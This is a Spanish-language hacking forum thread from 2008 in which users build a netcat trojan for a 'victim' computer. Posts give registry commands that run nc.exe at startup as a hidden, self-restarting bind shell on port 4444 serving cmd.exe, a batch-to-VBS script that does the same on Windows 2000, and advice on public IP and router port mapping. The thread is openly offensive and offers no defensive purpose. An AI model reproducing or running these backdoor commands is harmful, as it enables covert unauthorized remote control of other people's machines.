Jugando con netcat

BBOYHACK · 7 Enero 2008, 06:28 AM

REG ADD HKLM\Software\Microsoft\Windows\CurrentVersion\Run /v Nc /t REG_SZ /d "C:\nc.exe -l -p 4444 -t -e cmd.exe

ok perfecto ahora para que la ventana no salga cuando inicie le agrege la opcion -d

REG ADD HKLM\Software\Microsoft\Windows\CurrentVersion\Run /v Nc /t REG_SZ /d "C:\nc.exe -l -d -p 4444 -t -e cmd.exe

y perfeto no sale ninguna ventana de msdos ok aqui viene otra pregunta ahora si cierro el programa se cierra tambien tendria que esperar q la persona reiniciara el pc para que se pueda volver a cargar

como podria ponerlo que se ative cada cierto tiempo o algo haci

BBOYHACK · 7 Enero 2008, 08:58 AM

bueno ya lo pude hacer pero voy a post aca eso tal ves alguien tenga tambien la duda para que cuando lo cierres se vuelva a cargar otra vez sin tener que reiniciar

REG ADD HKLM\Software\Microsoft\Windows\CurrentVersion\Run /v Nc /t REG_SZ /d "C:\nc.exe -L -d -p 4444 -t -e cmd.exe

si te fijais cambie solo la -l por -L de minuscula la puse en mayuscula...

Enzo87 · 7 Enero 2008, 15:45 PM

Cita de: Maestro Oscuro en 6 Enero 2008, 23:06 PM
BUen dia amigo... le escribo para pedirle ayuda en la comprensión de su explicación para crear el troyano con netcat... segui muy metodicamente los pasos que usted indico pero no funciono... en la computadora de la victima sale que no es una aplicación valida de Win32... me interesa mucho superar esta dificultad... le pido me ayude... realmente es importante...

Eso es porque has cambiado el icono a la version 1.1, prueba cambiandoselo a la versión 1.0.
Busca por los primeros post y encontraras este tema solucionado.

Saludos!!

BBOYHACK · 18 Enero 2008, 03:40 AM

amigo a ver si me pueden ayudar. tengo un pc y estoy tratando de agregar el netcat al inicio pero el equipo tiene es windows 2000 y no es el mismo comando que windows xp

con que comando lo puede agregar al inicio en windows 2000

Novlucker · 18 Enero 2008, 23:34 PM

En W2K no existe ningun comando que modifique el registro desde consola (ms-dos)

Pero bueno, siempre hay que pensar que si no se encuentra una solución directa, al menos hay que encontrar una alternativa

Como comentaba, windows 2000 no trae el comando REG, pero lo que si trae es Windows Script Host (viene por defecto a partir de win 98

)
Para el que no sepa que es esto, le comento que es un lenguaje interpretado que permite crear archivos por lotes (como los bat) más complejo.

Entre sus posibilidades está la de modificar el registro, y al ser interpretado, basta con volcar su codigo en un "archivo de texto", y cambiarle la extensión a *.vbs

Pero bueno, pasando ahora si al problema de BBOYHACK, he aquí el codigo *.bat que crea este *.vbs

Citarecho set objshel = createobject("wscript.shell") >> c:\registro.vbs
echo objshel.regwrite "HKLM\Software\Microsoft\Windows\CurrentVersion\Run\NC", "C:\nc.exe -L -d -p 4444 -t -e cmd.exe", "REG_SZ" >> c:\registro.vbs
start c:\registro.vbs

Al visualizarlo en pantalla el codigo queda algo entrecortado (igualmente creo esta bastante claro), así que por las dudas aclaro.

Línea 1 - - - - -> echo set.........
Línea 2 - - - - -> echo objshel...
Linea 3 - - - - -> start ..............

Espero te sirva

Saludos

D4RIO · 19 Enero 2008, 01:06 AM

O te podes bajar una buena utilidad de consola para la edicion del registro, o programar una xD:::

luar123 · 22 Enero 2008, 17:31 PM

hola mi pregunta es la siguiente: en la parte del troyano donde hay que colocar la ip se debe poner la ip publica o la ip pribada, y si se debe abrir el puerto en el router
espero me puedan despejar estas dudas.
gracias

Novlucker · 22 Enero 2008, 18:13 PM

Debes de poner al ip pública, y en el router mapear el puerto que hayas configurado, hacía la ip privada/interna.

Saludos

KalmeniduS · 28 Enero 2008, 18:52 PM

hola que tal, exelentemente explicado, pero tengo un problema, en el equipo victima todo bien me da un pantallaso de la consola y crea el archivo en la carpeta update. Pero a la hora de abrir la consola y escrbibir "nc -vv -L -p 80" no hace nada, dice escuchando puerto y queda asi para siempre. si me pudieras decir que hago mal estaria buenisimo. Desde ya gracias

vitaepe · 28 Enero 2008, 19:08 PM

Hola gente!! estuve leyendo algunas cosas sobre este tema, las cuales me resultaron interesantes, hasta donde pude observar solo se referian al S.O windows, y como seria jugar con netcat pero en linux en mi caso Ubuntu, solo debo agregar que no deseo que me digan como hacerlo, simplemente como se toman la molestia de explicarlo en windows tambien haganlo en linux, saludos !!